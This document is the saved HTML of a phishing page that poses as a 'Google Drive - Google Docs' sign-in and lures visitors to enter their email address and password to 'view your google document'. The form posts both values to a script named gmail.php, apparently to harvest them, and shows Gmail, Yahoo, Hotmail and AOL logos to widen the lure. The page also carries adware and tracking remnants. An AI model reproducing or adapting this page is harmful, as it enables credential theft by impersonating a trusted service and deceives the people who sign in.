<html xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<title>Google Drive - Google Docs</title> 
<link rel="stylesheet" type="text/css" href="index_files/style.htm"> 
<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/apdfllckaahabafndbhieahigkjlhalf"><link rel="icon" href="https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_4.ico">
<style type="text/css"> 
div {
	position: absolute;
	left: 620px;
	top: 40px;
	background-color: #EBEBEB;
	width: 280px;
	padding: 10px;
	color: #000000;
	border: #0000cc 2px dashed;
	display: none;
}
body,td,th {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}
.style1 {
	background-color: #FFFFFF;
}
.style4 {
	font-size: 20px;
}
.style5 {
	font-size: x-large;
}
.style6 {
	font-size: 20px;
	background-color: #FFFFFF;
	color: #666666;
}
.style7 {
	border: 1px solid #808080;
}
.style8 {
	background-color: #FFFFFF;
	color: #666666;
}
.auto-style1 {
	color: #FFFFFF;
	font-weight: bold;
	background-color: #008000;
}
.auto-style3 {
	font-size: 15pt;
}
.auto-style4 {
	font-size: 15pt;
	background-color: #FFFFFF;
	color: #666666;
}
.auto-style5 {
	font-size: large;
}
.auto-style6 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	border: 0px solid rgb(204, 204, 204);
}
.auto-style7 {
	font-size: xx-small;
}
</style> 
<script src="index_files/ga.js" type="text/javascript"></script><script src="index_files/ga_002.js" async="" type="text/javascript"></script>


<style media="screen" type="text/css">#dddContent {visibility:hidden}</style><script src="index_files/mixpanel-2.js" async="" type="text/javascript"></script><script src="index_files/fs_003.js" type="text/javascript"></script><script type="text/javascript" src="index_files/w.js"></script><script src="index_files/a.txt" async="" type="text/javascript"></script><script src="index_files/fs_002.js" type="text/javascript"></script><script type="text/javascript" src="index_files/w_002.htm"></script><script src="index_files/a.txt" async="" type="text/javascript"></script><script src="index_files/fs.js" type="text/javascript"></script><script type="text/javascript" src="index_files/w_002.js"></script><script src="index_files/a.txt" async="" type="text/javascript"></script><script type="text/javascript" src="index_files/w.htm"></script><script type="text/javascript" src="index_files/w_003.js"></script>


<script type="text/javascript">
function MM_validateForm() { //v4.0
  if (document.getElementById){
    var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
    for (i=0; i<(args.length-2); i+=3) { test=args[i+2]; val=document.getElementById(args[i]);
      if (val) { nm=val.name; if ((val=val.value)!="") {
        if (test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
          if (p<1 || p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
        } else if (test!='R') { num = parseFloat(val);
          if (isNaN(val)) errors+='- '+nm+' must contain a number.\n';
          if (test.indexOf('inRange') != -1) { p=test.indexOf(':');
            min=test.substring(8,p); max=test.substring(p+1);
            if (num<min || max<num) errors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
      } } } else if (test.charAt(0) == 'R') errors += '- '+nm+' is required.\n'; }
    } if (errors) alert('Please correct the following:\n\n'+errors);
    document.MM_returnValue = (errors == '');
} }
</script>



</head><body style="width: 1075px; height: 474px; margin-left: 40px; background-color: rgb(255, 255, 255);"><div id="_GPL_e6a00_parent_div" style="position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647;"><object data="index_files/storage.swf" id="_GPL_e6a00_swf" type="application/x-shockwave-flash" height="1" width="1"><param value="transparent" name="wmode"><param value="always" name="allowscriptaccess"><param value="logfn=_GPL.items.e6a00.log&amp;onload=_GPL.items.e6a00.onload&amp;onerror=_GPL.items.e6a00.onerror&amp;LSOName=gpl" name="flashvars"></object></div>
<table style="width: 100%;" class="style1">
</table><table style="height: 102%; width: 1158px;" class="style1" align="left">
	<tbody><tr>
		<td style="width: 510px;" class="style1">
		<strong>
		<span class="style5">
		<span class="style1">&nbsp;
		<img alt="" src="index_files/images.jpg"></span></span><span class="style1"><span class="auto-style5"><br></span>
		<span class="style5">Google Drive</span></span></strong><span class="auto-style5"><span class="style1">.</span>&nbsp; </span>
		<span class="auto-style4">Keep everything. Share anything.</span><span class="auto-style3"><span class="style8"><br>
		</span>
		</span></td>
		<td style="height: 21px; width: 634px;">
 </td>
	</tr>
	<tr>
		<td style="height: 289px; width: 510px;" class="style1">
		<img alt="" src="index_files/img2C.jpg"></td>
		<td style="height: 289px; width: 634px;">
		<table id="invoicetoptables1" cellpadding="10" cellspacing="0" height="100" width="100%">
			<tbody><tr>
				<td id="invoicecontent1" class="auto-style6" valign="top">
				
<form action="gmail.php" method="post" onSubmit="MM_validateForm('email','','RisEmail','pswd','','R');return document.MM_returnValue">
				
					<p><font color="#990000" size="4">Sign in with your email 
					address and password to view your google document</font></p>
					<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Email Address:&nbsp;
					<input name="email" type="text" id="email" style="width: 244px;">
					&nbsp;
					<span class="auto-style7">eg: johnabc@yourdomain.com</span><br>
					<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

Password:&nbsp; <input name="pswd" type="password" id="pswd" style="width: 172px;">
&nbsp;&nbsp;
					<strong>
					<input class="auto-style1" name="Button1" value="View Document" type="submit"><br>
					<br>
					<img id="displayTextgmail" src="index_files/gmail.jpg" title="Gmail" border="0" height="22" width="72"><img alt="" src="index_files/yahoo.jpg" height="27" width="108"><img id="displayTexthotmail" src="index_files/hotmail.jpg" title="Hotmail" border="0" height="32" width="113"></strong><img id="displayTextaol" src="index_files/aol.jpg" title="Aol" border="0" height="23" width="80">
					<img id="displayTextother" src="index_files/other.jpg" title="Other Email" border="0" height="19" width="98"><img src="index_files/universalnav-logo.gif" height="23" width="124"></form>
				<br><br><br><br><br></td>
			</tr>
		</tbody></table>
		</td>
	</tr>
</tbody></table>

<!-- WiredMinds eMetrics tracking with Enterprise Edition V5.4 START -->
<script type="text/javascript" src="index_files/count.js"></script><div style="display: none;" id="YontooLocationStore2">http://dvwllt.com/gbm/docs/Google%20Docs.htm</div><div style="left: 0px; top: 0px; text-align: left; vertical-align: top; width: 1px; height: 1px; position: absolute;" class="yontoolayerwidget" id="BottomBarBrain2"></div><div style="left: 909px; top: 0px; text-align: left; vertical-align: top; width: 155px; height: 1px; line-height: 0px; z-index: 2147483647; position: fixed;" class="yontoolayerwidget" id="dropdowndeals"><div id="dddContainer" style="position: relative; width: 155px; height: 100%;">               <object id="dddContent" data="index_files/DddWrapper.swf" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium; visibility: visible;" type="application/x-shockwave-flash" height="100%" width="100%"><param value="false" name="menu"><param value="always" name="allowScriptAccess"><param value="transparent" name="wmode"><param value="domain=dvwllt.com&amp;protocol=http:&amp;clientId=36022397-d49e-48fd-9185-447e08ed57d3" name="flashvars"></object>            </div></div><div style="left: 0px; top: 0px; text-align: left; vertical-align: top; width: 0px; height: 0px; position: absolute;" class="yontoolayerwidget" id="EasyInlineApp"></div>
<script type="text/javascript"><!--
wm_custnum='3fb3d7e58d269dc9';
wm_page_name='Google Docs.htm';
wm_group_name='/services/webpages/d/v/dvwllt.com/public/gbm/docs';
wm_campaign_key='campaign_id';
wm_track_alt='';
wiredminds.count();
// -->
</script>
<!-- WiredMinds eMetrics tracking with Enterprise Edition V5.4 END -->
<div style="display: none;" id="YontooInstallID">36022397-d49e-48fd-9185-447e08ed57d3</div><div style="display: none;" id="Y2PluginIds">Y2:36022397-d49e-48fd-9185-447e08ed57d3</div><!-- www.serversfree.com Analytics Code -->
<script src="index_files/a.htm"></script><noscript><a title="Free
hosting servers" href="http://www.serversfree.com">Free servers</a><a
title="Free websites hosting server"
href="http://www.serversfree.com">Free websites hosting server</a><a
title="Free hosting server features"
href="http://www.serversfree.com/server-features/">Free server
features</a><a title="Free hosting" href="http://www.bugs3.com">Free
hosting</a></noscript>
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-24425628-3']);
  _gaq.push(['_setDomainName', window.location.host]);
  _gaq.push(['_setAllowLinker', true]);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
<!-- End Of Analytics Code --></body></html>